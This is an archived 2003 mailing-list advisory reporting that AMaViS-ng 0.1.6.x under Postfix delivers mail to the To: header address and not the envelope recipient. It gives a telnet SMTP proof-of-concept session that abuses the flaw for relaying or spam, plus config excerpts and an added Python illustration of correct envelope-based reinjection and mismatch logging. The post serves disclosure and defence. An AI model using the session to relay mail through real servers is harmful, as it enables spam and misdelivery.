Hi everyone -

with postfix using AMaViS-ng 0.1.6.x (tested: 0.1.6.2 and 0.1.6.3; 0.1.4.x is not vulnerable), all email gets forwarded to the address specified by the "To:" header line, ignoring the real recipient given via "RCPT TO:".

Possible exploit:

--%snip%--
#> telnet somemx.domain.tld 25
(220 somemx.domain.tld ESMTP Postfix)
helo amavis-ng
(250 somemx.domain.tld)
mail from:userXat_private
(250 ok)
rcpt to:userYat_private
(250 ok)
data
(354 End data with <CR><LF>.<CR><LF>)
From: userXat_private
To: userZat_private
Subject: AMaViS-ng 0.1.6.x bug
.
(250 Ok: queued as ...)
quit
(221 Bye)
--%snip%--

Requirements:
The mx (somemx.domain.tld) having postfix and AMaViS-ng 0.1.6.x installed must accept emails for userYat_private

What does it do:
userXat_private is sending an email to userYat_private.
The header of this email contains "To: userZat_private".
AMaViS-ng seems to parse the header and forwards the email to userZat_private.
userYat_private does not get this email.

As many postfix users trust their localhost (no restrictions for localhost), it is possible to relay an email or a spam mail this way.

configuration files (relevant parts):

# $postfix/master.cf
smtp      inet  n       -       n       -       -       smtpd
  -o content_filter=filter:
filter    unix  -       n       n       -       -       pipe
  flags=Rq user=mail argv=/usr/bin/amavis ${sender} -- ${recipient}
# end of master.cf

# $amavis-ng/amavis.conf
[global]
mail-transfer-agent = Postfix

[Postfix]
postfix = /usr/sbin/sendmail
args = -i -f
# end of amavis.conf

There is no problem with AMaViS == 0.1.4.x

Kind regards,
Phil Cyc
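Added illustration, not part of the original post or of AMaViS-ng itself: a pipe-based content filter invoked by Postfix as `amavis ${sender} -- ${recipient}` must reinject the message to the envelope recipients it received on the command line, never to the addresses in the To:/Cc: headers. The helper names, the `example.invalid` addresses and the sample message (modelled on the session above) are constructed here; `header_recipients` reproduces the reported 0.1.6.x behaviour for comparison, and `recipient_mismatch` is a check an operator could log on.

```python
from email import message_from_bytes
from email.utils import getaddresses

# Constructed sample, modelled on the report: the envelope recipient
# (RCPT TO) is userY, while the To: header names userZ.
SAMPLE_RAW = (
    b"From: userX@example.invalid\r\n"
    b"To: userZ@example.invalid\r\n"
    b"Subject: AMaViS-ng 0.1.6.x bug\r\n"
    b"\r\n"
    b"body\r\n"
)
# Arguments after the program name, as master.cf passes them:
# ${sender} -- ${recipient}
SAMPLE_ARGS = ["userX@example.invalid", "--", "userY@example.invalid"]


def parse_filter_args(args):
    """Split 'sender -- recipient...' into (sender, [recipients]).
    An empty sender (null envelope sender) is allowed."""
    if "--" not in args:
        raise ValueError("expected 'sender -- recipient...'")
    sep = args.index("--")
    if sep > 1:
        raise ValueError("exactly one sender argument expected")
    sender = args[0] if sep == 1 else ""
    recipients = args[sep + 1:]
    if not recipients:
        raise ValueError("no envelope recipients given")
    return sender, recipients


def header_recipients(msg):
    """Addresses taken from To:/Cc: -- what the buggy filter delivered to."""
    fields = msg.get_all("To", []) + msg.get_all("Cc", [])
    return [addr for _, addr in getaddresses(fields) if addr]


def reinject_command(sender, envelope_rcpts, sendmail="/usr/sbin/sendmail"):
    """Reinjection command built from the envelope recipients only
    (mirrors 'postfix = /usr/sbin/sendmail', 'args = -i -f')."""
    return [sendmail, "-i", "-f", sender, "--", *envelope_rcpts]


def recipient_mismatch(msg, envelope_rcpts):
    """Header addresses that are not envelope recipients; worth logging,
    since that is exactly the case the bug turns into misdelivery."""
    env = {r.lower() for r in envelope_rcpts}
    return sorted({h for h in header_recipients(msg) if h.lower() not in env})


def demo(args=SAMPLE_ARGS, raw=SAMPLE_RAW):
    sender, rcpts = parse_filter_args(args)
    msg = message_from_bytes(raw)
    return {
        "buggy_targets": header_recipients(msg),
        "command": reinject_command(sender, rcpts),
        "mismatch": recipient_mismatch(msg, rcpts),
    }
```

On the sample, `demo()` shows the header-derived target (userZ), the correct reinjection command addressed to userY, and userZ flagged as a header/envelope mismatch.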
This archive was generated by hypermail 2b30 : Tue Apr 08 2003 - 09:38:52 PDT